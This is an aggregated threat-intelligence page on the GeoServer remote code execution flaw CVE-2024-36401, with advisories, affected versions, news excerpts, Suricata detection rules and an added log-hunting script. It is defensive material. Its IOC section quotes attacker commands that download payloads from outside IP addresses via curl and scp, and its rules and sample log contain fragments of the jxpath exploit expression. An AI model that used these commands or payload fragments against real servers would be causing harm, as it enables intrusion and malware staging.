CVE-2024-36401
Published 2024-07-01
Priority P1 · 98 · critical 9.8 · CVSS 3.1 · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability, due 2024-08-05
Exploited in the wild
EPSS 99.81% (100.0th percentile)
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.
Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geoserver | geoserver | < 2.22.6 | 2.22.6 |
| geoserver | geoserver | — | — |
| geoserver | geoserver | — | — |
| geoserver | geoserver | — | — |
| geoserver | geoserver | >= 2.23.0 < 2.23.6 | 2.23.6 |
| geoserver | geoserver | >= 2.24.0 < 2.24.4 | 2.24.4 |
| geoserver | geoserver | >= 2.25.0 < 2.25.2 | 2.25.2 |
| geotools | geotools | < 29.6 | 29.6 |
| geotools | geotools | — | — |
| geotools | geotools | — | — |
| geotools | geotools | >= 30.1 < 30.4 | 30.4 |
| geotools | geotools | >= 31.1 < 31.2 | 31.2 |
Detection & IOCs (extracted from sources)
- Command: `curl --connect-timeout 3 -m 10 -o c:\windows\temp\{file name} http://167[.]172[.]89[.]142/{file name}`
- Command: `cmd /c "scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\windows\temp\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file name} c:\windows\temp\"`
- Hunt for outbound SCP connections on the non-standard port 23 from GeoServer hosts, particularly to 152.42.243.170, which was used for lateral payload staging.
- Exploitation is confirmed across WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute request types; monitor all six for anomalous property name values containing XPath/expression syntax.
- Shadowserver observed CVE-2024-36401 attacks starting on July 9, 2024; use this date as a baseline for retrospective hunting in GeoServer OGC request logs.
- The vulnerability affects ALL GeoServer instances (not only those using complex/Application Schema feature types) because XPath evaluation is incorrectly applied to simple feature types as well.
- The workaround of removing gt-complex-x.y.jar may break GeoServer functionality or prevent deployment if the gt-complex module is required; patching to 2.22.6, 2.23.6, 2.24.4 or 2.25.2 is preferred.
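As an added example (not code from this page, GeoServer or any of the sources above), the retrospective hunt described in the detection notes, run over constructed access-log lines. It assumes combined-log-format entries and that the property-name input reaches GeoServer through the `propertyName`/`valueReference` GET parameters; POST bodies never appear in access logs, which is why the Suricata rules below cover `POST /geoserver/wfs`.

```python
"""Retrospective hunt over GeoServer access logs for CVE-2024-36401.

Added example, not from the page or the GeoServer project. The log lines
are constructed. A legitimate OGC property name is a plain attribute path;
anything carrying expression syntax (parentheses, quotes, Java class
names) in propertyName/valueReference is flagged for review.
"""
import re
from datetime import date
from urllib.parse import parse_qsl, urlsplit

# Parameters GeoServer hands to the vulnerable XPath evaluation
# (WFS GetFeature / GetPropertyValue); matched case-insensitively.
PROPERTY_PARAMS = {"propertyname", "valuereference"}

# A legitimate property name: one or more comma-separated attribute paths
# made of letters, digits, '_', ':', '/', '.', '@', '-'.  Parentheses,
# quotes, commas inside a path or spaces never occur in a normal request.
LEGIT_NAME = re.compile(r"^[A-Za-z_][\w:./@\-]*(,[A-Za-z_][\w:./@\-]*)*$")

# Substrings the Suricata signatures on this page key on, checked in every
# query parameter so WMS/WPS variants are not missed.
EXPRESSION_HINTS = ("exec(", "java.lang.runtime",
                    "scriptenginemanager", "getenginebyname")

# First in-the-wild exploitation observed by Shadowserver (from the page).
BASELINE = date(2024, 7, 9)

# Minimal combined-log-format parser: day/month/year, method, target, status.
LOG_RE = re.compile(
    r'\[(\d{2})/(\w{3})/(\d{4})[^\]]*\] "(\w+) (\S+) [^"]*" (\d{3})')
MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}


def suspicious_params(target):
    """Return (param, decoded value) pairs that look like expressions."""
    hits = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        lowered = value.lower()
        if key.lower() in PROPERTY_PARAMS and not LEGIT_NAME.match(value):
            hits.append((key, value))          # not a plain attribute name
        elif any(h in lowered for h in EXPRESSION_HINTS):
            hits.append((key, value))          # known expression fragment
    return hits


def hunt(lines):
    """Return one finding per GeoServer request with expression-like input."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        day, mon, year, method, target, status = m.groups()
        if "/geoserver/" not in target.lower():
            continue
        hits = suspicious_params(target)
        if not hits:
            continue
        when = date(int(year), MONTHS[mon], int(day))
        findings.append({
            "date": when.isoformat(),
            "method": method,
            "path": urlsplit(target).path,
            "status": status,
            "after_baseline": when >= BASELINE,
            "hits": hits,
        })
    return findings


# Constructed sample log (fake addresses, redacted payload tail).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Jul/2024:09:15:02 +0000] "GET /geoserver/wfs?service=WFS'
    '&version=2.0.0&request=GetFeature&typeNames=topp:states'
    '&propertyName=java.lang.Runtime HTTP/1.1" 400 211',
    '203.0.113.5 - - [05/Jul/2024:11:40:19 +0000] "GET /geoserver/wfs?service=WFS'
    '&version=2.0.0&request=GetFeature&typeNames=topp:states'
    '&propertyName=STATE_NAME,PERSONS HTTP/1.1" 200 8842',
    '198.51.100.7 - - [10/Jul/2024:14:02:11 +0000] "GET /geoserver/wfs?service=WFS'
    '&version=2.0.0&request=GetPropertyValue&typeNames=topp:states'
    '&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%5BREDACTED%5D%29'
    ' HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Jul/2024:08:00:00 +0000] "GET /geoserver/wms?service=WMS'
    '&request=GetMap&layers=topp:states&styles=&bbox=-124.73,24.96,-66.97,49.37'
    '&width=768&height=330&srs=EPSG:4326&format=image/png HTTP/1.1" 200 40211',
    '198.51.100.7 - - [12/Jul/2024:16:21:33 +0000] "POST /geoserver/wfs HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Jul/2024:16:22:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f)
```

The POST on 12 July produces no finding because its body is not logged; pair this hunt with the network signatures below for POST coverage.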
CVSS provenance
- NVD: v3.1 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 9.8 CRITICAL
- CISA: 9.8 CRITICAL
CISA
OSGeo GeoServer GeoTools Eval Injection Vulnerability
cisa·2024-07-15·CVSS 9.8
CVE-2024-36401 [CRITICAL] CWE-95 OSGeo GeoServer GeoTools Eval Injection Vulnerability
Vulnerability: OSGeo GeoServer GeoTools Eval Injection Vulnerability
Affected: OSGeo GeoServer
OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects an open-source component, third-party library, or a protocol used by different products. For more information, please see: https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv, https://github.com/geotools/geotools/pull/4797 ; https://
GHSA
Remote Code Execution (RCE) vulnerability in geoserver
ghsa·2024-07-01
CVE-2024-36401 [CRITICAL] CWE-94 Remote Code Execution (RCE) vulnerability in geoserver
Remote Code Execution (RCE) vulnerability in geoserver
### Summary
Multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
### Details
The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances.
### PoC
No
OSV
Remote Code Execution (RCE) vulnerability in geoserver
osv·2024-07-01
CVE-2024-36401 [CRITICAL] Remote Code Execution (RCE) vulnerability in geoserver
Remote Code Execution (RCE) vulnerability in geoserver
### Summary
Multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
### Details
The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances.
### PoC
No
VulnCheck
OSGeo GeoServer GeoTools Eval Injection Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-36401 [CRITICAL] CWE-95 OSGeo GeoServer GeoTools Eval Injection Vulnerability
OSGeo GeoServer GeoTools Eval Injection Vulnerability
OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input.
Affected: OSGeo GeoServer
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2024-36401; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-07-28&host_type=src&vulnerability=cve-2024-3640
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:14; content:"/geoserver/wfs"; fast_pattern; http.request_body; content:"valuereference"; nocase; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:50; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055808; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Internal, performance_impact Lo
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:14; content:"/geoserver/wfs"; fast_pattern; http.request_body; content:"propertyname"; nocase; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:50; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055805; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Internal, performance_impact Low,
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/geoserver/w"; fast_pattern; startswith; content:"s?"; distance:1; within:2; content:"valuereference"; nocase; distance:0; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:40; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055811; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Int
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/geoserver/w"; fast_pattern; startswith; content:"s?"; distance:1; within:2; content:"propertyname"; nocase; distance:0; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:40; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055810; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Inter
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:14; content:"/geoserver/wfs"; fast_pattern; http.request_body; content:"valuereference"; nocase; content:"eval|28|getEngineByName|28|javax.script.ScriptEngineManager.new|28 29 2c|"; nocase; within:70; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055809; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Inte
Nuclei
GeoServer and GeoTools - Remote Code Execution
nuclei·CVSS 9.8
CVE-2024-36404 [CRITICAL] GeoServer and GeoTools - Remote Code Execution
GeoServer and GeoTools - Remote Code Execution
GeoTools is an open source Java library that provides tools for geospatial data. Prior to versions 31.2, 30.4, and 29.6, Remote Code Execution (RCE) is possible if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input. Versions 31.2, 30.4, and 29.6 contain a fix for this issue. As a workaround, GeoTools can operate with reduced functionality by removing the `gt-complex` jar from one's application. As an example of the impact, application schema `datastore` would not function without the ability to use XPath expressions to query complex content. Alternatively, one may utilize a drop-in replacement GeoTools jar from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 2
Nuclei
GeoServer RCE in Evaluating Property Name Expressions
nuclei·CVSS 9.8
CVE-2024-36401 [CRITICAL] GeoServer RCE in Evaluating Property Name Expressions
GeoServer RCE in Evaluating Property Name Expressions
In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
Template:
id: CVE-2024-36401
info:
  name: GeoServer RCE in Evaluating Property Name Expressions
  author: DhiyaneshDk,ryanborum
  severity: critical
  description: |
    In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names a
Metasploit
Geoserver unauthenticated Remote Code Execution
metasploit
Geoserver unauthenticated Remote Code Execution
Geoserver unauthenticated Remote Code Execution
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets. In the GeoServer versions = 2.24.0, = 2.25.0, < 2.25.1, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the sy
Hackernews
New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
blogs_hackernews·2026-06-26·CVSS 9.8
CVE-2021-26855 [CRITICAL] New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
## New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
A newly discovered cyber attack campaign has been observed delivering a previously undocumented malware family called SharkLoader that acts as a loader for deploying Cobalt Strike Beacon on compromised hosts.
Kaspersky, which is tracking the activity under the moniker StrikeShark , said the campaign has targeted a diplomatic organization in Indonesia, government organizations in Taiwan, software development companies across multiple countries, and entities associated with other sectors located in Hong Kong, Lebanon, Syria, Colombia, North Macedonia, Ne
Securelist
StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader
blogs_securelist·2026-06-24
CVE-2021-26855 StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader
Fareed Radzi
## Introduction
During our research of activity affecting a diplomatic organization in Indonesia, we uncovered a previo
Wiz
Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
blogs_wiz·2026-01-22·CVSS 8.7
CVE-2025-55182 [HIGH] Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security: noteworthy incidents, exclusive data, and crucial vulnerabilities. Let’s jump in.
## 🔍 Highlights
React2Shell: Critical RCE Vulnerability in React and Next.js
React2Shell (CVE-2025-55182) is a critical, unauthenticated remote code execution vulnerability rooted in insecure deserialization within the React Server Components (RSC) “Flight” protocol, impacting React 19 and RSC-enabled frameworks, most notably Next.js. The flaw affects default configurations, meaning standard production deployments can be exploited with a single crafted HTTP request and no developer misconfiguration, with exploitation demonstrating near-100% reliability.
Since early December 2025, exploitation has been observed in the wild by multipl
Bleepingcomputer
CISA orders feds to patch actively exploited Geoserver flaw
blogs_bleepingcomputer·2025-12-12·CVSS 8.2
[HIGH] CISA orders feds to patch actively exploited Geoserver flaw
## CISA orders feds to patch actively exploited Geoserver flaw
## Sergiu Gatlan
CISA has ordered U.S. federal agencies to patch a critical GeoServer vulnerability now actively exploited in XML External Entity (XXE) injection attacks.
In such attacks, an XML input containing a reference to an external entity is processed by a weakly configured XML parser, allowing threat actors to launch denial-of-service attacks, access confidential data, or perform Server-Side Request Forgery (SSRF) to interact with internal systems.
The security flaw (tracked as CVE-2025-58360 ) flagged by CISA on Thursday is an unauthenticated XML External Entity (XXE) vulnerability in GeoServer 2.26.1 and prior versions (an open-source server for sharing geospatial data over the Internet) that can be exploited to r
Tenable
Cybersecurity Snapshot: CISA Highlights Vulnerability Management Importance in Breach Analysis, as Orgs Are Urged To Patch Cisco Zero-Days
blogs_tenable·2025-09-26
Cybersecurity Snapshot: CISA Highlights Vulnerability Management Importance in Breach Analysis, as Orgs Are Urged To Patch Cisco Zero-Days
Bleepingcomputer
CISA says hackers breached federal agency using GeoServer exploit
blogs_bleepingcomputer·2025-09-23·CVSS 9.8
CVE-2024-36401 [CRITICAL] CISA says hackers breached federal agency using GeoServer exploit
## CISA says hackers breached federal agency using GeoServer exploit
## Sergiu Gatlan
CISA has revealed that attackers breached the network of an unnamed U.S. federal civilian executive branch (FCEB) agency last year after compromising an unpatched GeoServer instance.
The security bug (tracked as CVE-2024-36401 ) is a critical remote code execution (RCE) vulnerability patched on June 18, 2024. CISA added the flaw to its catalog of actively exploited vulnerabilities roughly one month later , after multiple security researchers shared proof-of-concept exploits online [ 1 , 2 , 3 ], demonstrating how to gain code execution on exposed servers.
While the cybersecurity agency did not provide any details on how the flaws were being exploited in the wild, threat monitoring service Shadowserver
Unit42
Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
blogs_unit42·2025-08-21·CVSS 9.8
CVE-2024-36401 [CRITICAL] Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
## Executive Summary
We have detected a campaign aimed at gaining access to victims’ machines and monetizing access to their bandwidth. It functions by exploiting the CVE-2024-36401 vulnerability in the GeoServer geospatial database. This Critical-severity remote code execution vulnerability has a CVSS score of 9.8. Criminals have used the vulnerability to deploy legitimate software development kits (SDKs) or modified apps to gain passive income via network sharing or residential proxies.
This method of generating passive income is particularly stealthy. It mimics a monetization strategy used by some legitimate app developers who choose SDKs instead of displaying traditional ads. This can be a well-intentioned choice that protects the user experience and improves app retention.
The appl
Trendmicro
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
blogs_trendmicro·2024-09-19·CVSS 9.8
[CRITICAL] Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
APT & Targeted Attacks
## Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.
By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen, Sep 19, 2024
## Summary
Threat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other countries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
CVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy malicious components.
The threat actor empl
Fortinet
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs
blogs_fortinet·2024-09-05·CVSS 9.8
CVE-2024-36401 [CRITICAL] Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401
By Cara Lin and Vincent Li | September 05, 2024
Affected Platforms: GeoServer prior to versions 2.23.6, 2.24.4, and 2.25.2
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
GeoServer is an open-source software server written in Java that allows users to share and edit geospatial data. It is the reference implementation of the Open Geospatial Consortium (OGC) Web Feature Service (WFS) and Web Coverage Service (WCS) standards. On July 1, the project maintainers released
Bleepingcomputer
CISA warns critical Geoserver GeoTools RCE flaw is exploited in attacks
blogs_bleepingcomputer·2024-07-16·CVSS 9.8
CVE-2024-36401 [CRITICAL] CISA warns critical Geoserver GeoTools RCE flaw is exploited in attacks
## CISA warns critical Geoserver GeoTools RCE flaw is exploited in attacks
## Lawrence Abrams
CISA is warning that a critical GeoServer GeoTools remote code execution flaw tracked as CVE-2024-36401 is being actively exploited in attacks.
GeoServer is an open-source server that allows users to share, process, and modify geospatial data.
On June 30th, GeoServer disclosed a critical 9.8 severity remote code execution vulnerability in its GeoTools plugin caused by unsafely evaluating property names as XPath expressions.
"The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions," reads the GeoServer advisory .
"This
Checkpoint
8th July – Threat Intelligence Report
blogs_checkpoint·2024-07-08
CVE-2024-6387 8th July – Threat Intelligence Report
## 8th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 8th July, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
FIA, the governing body for Formula 1, disclosed a data breach stemming from a phishing attack on their email accounts. The attack led to unauthorized access to personal data, and the incident has been reported to relevant data protection regulators. FIA is taking steps to bolster security and has initiated protective measures fo
Greynoiseio
NoiseLetter July 2024
blogs_greynoiseio
NoiseLetter July 2024
Threat Intel
Earth Baxia
threat_intel·CVSS 9.8
CVE-2024-36401 [CRITICAL] Earth Baxia
# Threat Actor: Earth Baxia
## Description
Earth Baxia is a threat actor operating out of China, targeting government organizations in Taiwan and potentially across the APAC region, using spear-phishing emails and exploiting the GeoServer vulnerability CVE-2024-36401 for remote code execution, deploying customized Cobalt Strike components with altered signatures, leveraging GrimResource and AppDomainManager injection techniques to deliver additional payloads, and utilizing a new backdoor named EAGLEDOOR for multi-protocol communication and payload delivery.
## Associated Malware Families (1)
win.cobalt_strike
arXiv
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
arxiv_fulltext·2025-10-28
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
## Abstract
Cybersecurity spans multiple interconnected domains, complicating the development of meaningful, labor-relevant benchmarks. Existing benchmarks assess isolated skills rather than integrated performance. We find that pre-trained knowledge of cybersecurity in LLMs does not imply attack and defense abilities, revealing a gap between knowledge and capability. To address this limitation, we present the Cybersecurity AI Benchmark (CAIBench), a modular meta-benchmark framework that allows evaluating LLM models and agents across offensive and defensive cybersecurity domains, taking a step towards meaningfully measuring their labor-relevance. CAIBench integrates five evaluation categories, covering over 10,000 instances: Jeopardy-style CTFs, Attack and Defense CTFs, Cyber Range e
References
- https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852
- https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
- https://github.com/geotools/geotools/pull/4797
- https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w
- https://osgeo-org.atlassian.net/browse/GEOT-7587
- https://www.vicarius.io/vsociety/posts/geoserver-rce-cve-2024-36401
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-36401
Timeline
- 2024-07-01: Published
- 2024-07-15: Added to CISA KEV
- Exploited in the wild